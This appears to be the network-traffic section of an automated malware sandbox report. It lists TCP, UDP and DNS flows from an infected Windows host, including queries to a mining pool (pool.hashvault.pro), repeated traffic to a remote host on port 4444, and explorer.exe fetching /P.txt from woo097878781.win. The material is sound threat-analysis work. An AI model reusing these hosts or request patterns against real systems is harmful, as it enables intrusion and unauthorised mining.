Dec 12, 2024 22:41:16.538006067 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:16.538016081 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:16.547199965 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:16.668299913 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:16.668385983 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:16.668839931 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:16.788930893 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:18.232165098 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:18.232585907 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:18.232614040 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:18.233644009 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:18.233700037 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:18.234083891 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:18.234142065 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:18.276911974 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:18.276938915 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:18.472985029 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:18.503854990 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:18.504690886 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:18.624747038 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:19.192492008 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:19.269575119 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:21.913269997 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:21.913347006 CET	443	49922	142.250.181.132	192.168.2.5
Dec 12, 2024 22:41:21.913455009 CET	49922	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:41:37.431730986 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:37.566652060 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:41:59.457062006 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:41:59.567109108 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:42:13.992916107 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:13.993005037 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:13.993083954 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:14.002074957 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:14.002110958 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.427834034 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.429106951 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:15.429171085 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.430644035 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.430732965 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:15.432549000 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:15.432668924 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.432734966 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:15.432750940 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:15.567111969 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:16.529951096 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:16.530040026 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:16.530106068 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:16.537293911 CET	50034	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:42:16.537313938 CET	443	50034	154.216.20.243	192.168.2.5
Dec 12, 2024 22:42:16.584506989 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:16.584543943 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:16.584630013 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:16.584897995 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:16.584911108 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.283826113 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.458995104 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:18.852951050 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:18.852966070 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.854124069 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.854140043 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.854196072 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:18.854618073 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:18.854685068 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:18.957031965 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:18.957051039 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:19.081943035 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:21.431727886 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:42:21.657315969 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:42:21.771749020 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:21.771924019 CET	443	50037	142.250.181.132	192.168.2.5
Dec 12, 2024 22:42:21.772249937 CET	50037	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:42:43.474013090 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:42:43.562711000 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:43:05.899555922 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:43:06.066584110 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:43:14.379930019 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:14.379976988 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:14.380044937 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:14.386415958 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:14.386451960 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.831231117 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.832355022 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:15.832391024 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.833283901 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.833357096 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:15.834930897 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:15.834990978 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.835071087 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:15.835078955 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:15.835136890 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:15.879331112 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:16.377219915 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:16.377321005 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:16.377429962 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:16.384975910 CET	50115	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:43:16.385008097 CET	443	50115	154.216.20.243	192.168.2.5
Dec 12, 2024 22:43:27.570724964 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:43:27.754446983 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:43:29.871234894 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:43:30.066092014 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:43:51.486423969 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:43:51.565119982 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:44:02.461453915 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:44:02.556874037 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:44:15.355721951 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:15.355784893 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:15.355874062 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:15.363358021 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:15.363390923 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.788784981 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.790050983 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:16.790081024 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.791086912 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.791167974 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:16.793054104 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:16.793127060 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.793178082 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:16.793190002 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:16.793271065 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:16.839335918 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:17.341546059 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:17.341649055 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:17.341725111 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:17.347948074 CET	50120	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:44:17.347966909 CET	443	50120	154.216.20.243	192.168.2.5
Dec 12, 2024 22:44:23.454138041 CET	4444	49923	185.157.162.216	192.168.2.5
Dec 12, 2024 22:44:23.660501003 CET	49923	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:44:25.698546886 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:25.698591948 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:25.698669910 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:25.698865891 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:25.698878050 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.390970945 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.391406059 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:27.391424894 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.391735077 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.391794920 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:27.392332077 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.392380953 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:27.392517090 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:27.392571926 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.392659903 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:27.392667055 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:27.457041025 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:28.190145969 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:28.190176010 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:28.190231085 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:28.190251112 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:28.255069971 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:28.256680012 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:28.256725073 CET	443	50131	172.217.19.238	192.168.2.5
Dec 12, 2024 22:44:28.256783009 CET	50131	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:44:43.348124981 CET	49677	443	192.168.2.5	23.1.237.16
Dec 12, 2024 22:44:43.759015083 CET	49703	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:44:43.770046949 CET	49677	443	192.168.2.5	23.1.237.16
Dec 12, 2024 22:44:44.066361904 CET	49703	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:44:44.377507925 CET	49677	443	192.168.2.5	23.1.237.16
Dec 12, 2024 22:44:44.769361973 CET	49703	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:44:45.482791901 CET	4444	49923	185.157.162.216	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 22:40:10.560363054 CET	55329	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:10.815617085 CET	53	55329	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:12.356204033 CET	51027	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:12.356395006 CET	56973	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:12.482945919 CET	57465	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:12.493165016 CET	53	51027	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:12.493204117 CET	53	56973	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:12.495532990 CET	53	62692	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:12.537445068 CET	53	53429	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:12.623996019 CET	53	57465	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:15.043831110 CET	55829	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:15.043961048 CET	58383	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:15.180901051 CET	53	55829	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:15.185084105 CET	53	58383	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:15.296176910 CET	53	53701	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:20.727674961 CET	53	50338	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:23.819150925 CET	53	55341	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:26.714723110 CET	53	52464	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.118532896 CET	59330	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.118664980 CET	60986	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.256526947 CET	53	59330	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.256592035 CET	53	60986	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.398173094 CET	60047	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.398344994 CET	64318	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.522361994 CET	54439	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.522644997 CET	62646	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:27.536459923 CET	53	60047	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.536482096 CET	53	64318	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.659720898 CET	53	54439	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:27.659831047 CET	53	62646	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:30.174865961 CET	53	63750	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:31.031470060 CET	59317	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:31.031601906 CET	64959	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:31.168749094 CET	53	64959	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:31.169661999 CET	53	59317	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:31.170401096 CET	53	62632	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:32.493436098 CET	53	59731	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:35.829642057 CET	62953	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:35.829879045 CET	50629	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:35.968128920 CET	53	62953	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:35.968831062 CET	53	50629	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:40.617722988 CET	49860	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:40.617880106 CET	54884	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:40:40.757731915 CET	53	63732	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:40.757776976 CET	53	54884	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:40.757807970 CET	53	49860	1.1.1.1	192.168.2.5
Dec 12, 2024 22:40:51.677800894 CET	53	50055	1.1.1.1	192.168.2.5
Dec 12, 2024 22:41:11.963516951 CET	53	63296	1.1.1.1	192.168.2.5
Dec 12, 2024 22:41:15.556380033 CET	53	65144	1.1.1.1	192.168.2.5
Dec 12, 2024 22:41:46.855658054 CET	53	64192	1.1.1.1	192.168.2.5
Dec 12, 2024 22:42:33.163193941 CET	53	63435	1.1.1.1	192.168.2.5
Dec 12, 2024 22:43:44.066054106 CET	138	138	192.168.2.5	192.168.2.255
Dec 12, 2024 22:43:51.251617908 CET	53	57131	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:21.612274885 CET	59660	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:21.612319946 CET	54682	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:21.749500990 CET	53	59660	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:21.750046968 CET	53	54682	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:22.538547039 CET	61181	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:22.538670063 CET	53510	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:22.676539898 CET	53	61181	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:22.680648088 CET	53	53510	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:24.678541899 CET	53	59070	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:24.679406881 CET	53	51913	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:25.558006048 CET	63598	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:25.558094025 CET	53136	53	192.168.2.5	1.1.1.1
Dec 12, 2024 22:44:25.696274042 CET	53	53136	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:25.696347952 CET	53	63598	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:28.254410982 CET	53	59912	1.1.1.1	192.168.2.5
Dec 12, 2024 22:44:28.431551933 CET	53	49218	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 22:40:10.560363054 CET	192.168.2.5	1.1.1.1	0xb62b	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:12.356204033 CET	192.168.2.5	1.1.1.1	0xb887	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:12.356395006 CET	192.168.2.5	1.1.1.1	0xb7f0	Standard query (0)	google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:12.482945919 CET	192.168.2.5	1.1.1.1	0x3cd4	Standard query (0)	woo097878781.win	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:15.043831110 CET	192.168.2.5	1.1.1.1	0x5986	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:15.043961048 CET	192.168.2.5	1.1.1.1	0xb591	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:27.118532896 CET	192.168.2.5	1.1.1.1	0xe780	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:27.118664980 CET	192.168.2.5	1.1.1.1	0xd99	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:27.398173094 CET	192.168.2.5	1.1.1.1	0xeca7	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:27.398344994 CET	192.168.2.5	1.1.1.1	0x6a57	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:27.522361994 CET	192.168.2.5	1.1.1.1	0xcdf1	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:27.522644997 CET	192.168.2.5	1.1.1.1	0x9970	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:31.031470060 CET	192.168.2.5	1.1.1.1	0x9bbb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:31.031601906 CET	192.168.2.5	1.1.1.1	0x8ab4	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:35.829642057 CET	192.168.2.5	1.1.1.1	0x717	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:35.829879045 CET	192.168.2.5	1.1.1.1	0x7a7	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:40:40.617722988 CET	192.168.2.5	1.1.1.1	0xfaed	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:40.617880106 CET	192.168.2.5	1.1.1.1	0xea5d	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:44:21.612274885 CET	192.168.2.5	1.1.1.1	0x417	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:21.612319946 CET	192.168.2.5	1.1.1.1	0xf5d0	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:44:22.538547039 CET	192.168.2.5	1.1.1.1	0x12ef	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:22.538670063 CET	192.168.2.5	1.1.1.1	0x4acd	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 12, 2024 22:44:25.558006048 CET	192.168.2.5	1.1.1.1	0x593	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:25.558094025 CET	192.168.2.5	1.1.1.1	0xa310	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 22:40:10.815617085 CET	1.1.1.1	192.168.2.5	0xb62b	No error (0)	pool.hashvault.pro		5.188.137.200	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:10.815617085 CET	1.1.1.1	192.168.2.5	0xb62b	No error (0)	pool.hashvault.pro		37.203.243.102	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:12.493165016 CET	1.1.1.1	192.168.2.5	0xb887	No error (0)	google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:12.493204117 CET	1.1.1.1	192.168.2.5	0xb7f0	No error (0)	google.com			65	IN (0x0001)	false
Dec 12, 2024 22:40:12.623996019 CET	1.1.1.1	192.168.2.5	0x3cd4	No error (0)	woo097878781.win		154.216.20.243	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:15.180901051 CET	1.1.1.1	192.168.2.5	0x5986	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:15.185084105 CET	1.1.1.1	192.168.2.5	0xb591	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 22:40:27.256526947 CET	1.1.1.1	192.168.2.5	0xe780	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:27.256526947 CET	1.1.1.1	192.168.2.5	0xe780	No error (0)	www3.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:27.256592035 CET	1.1.1.1	192.168.2.5	0xd99	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:27.536459923 CET	1.1.1.1	192.168.2.5	0xeca7	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:27.536459923 CET	1.1.1.1	192.168.2.5	0xeca7	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:27.536482096 CET	1.1.1.1	192.168.2.5	0x6a57	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:27.659720898 CET	1.1.1.1	192.168.2.5	0xcdf1	No error (0)	play.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:31.168749094 CET	1.1.1.1	192.168.2.5	0x8ab4	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 22:40:31.169661999 CET	1.1.1.1	192.168.2.5	0x9bbb	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:35.968128920 CET	1.1.1.1	192.168.2.5	0x717	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:35.968128920 CET	1.1.1.1	192.168.2.5	0x717	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:40:35.968831062 CET	1.1.1.1	192.168.2.5	0x7a7	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:40:40.757807970 CET	1.1.1.1	192.168.2.5	0xfaed	No error (0)	play.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:21.749500990 CET	1.1.1.1	192.168.2.5	0x417	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:44:21.749500990 CET	1.1.1.1	192.168.2.5	0x417	No error (0)	www3.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:21.750046968 CET	1.1.1.1	192.168.2.5	0xf5d0	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 22:44:22.676539898 CET	1.1.1.1	192.168.2.5	0x12ef	No error (0)	play.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 12, 2024 22:44:25.696347952 CET	1.1.1.1	192.168.2.5	0x593	No error (0)	play.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

woo097878781.win

www.google.com

https:

apis.google.com

play.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	154.216.20.243	443	7236	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:14 UTC	111	OUT	GET /P.txt HTTP/1.1 Accept: / Connection: close Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:40:14 UTC	302	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:40:14 GMT Content-Type: text/plain Content-Length: 480 Connection: close X-Accel-Version: 0.01 Last-Modified: Thu, 12 Dec 2024 20:01:07 GMT ETag: "1e0-629182cc69ccb" Accept-Ranges: bytes Vary: Accept-Encoding X-Powered-By: PleskLin
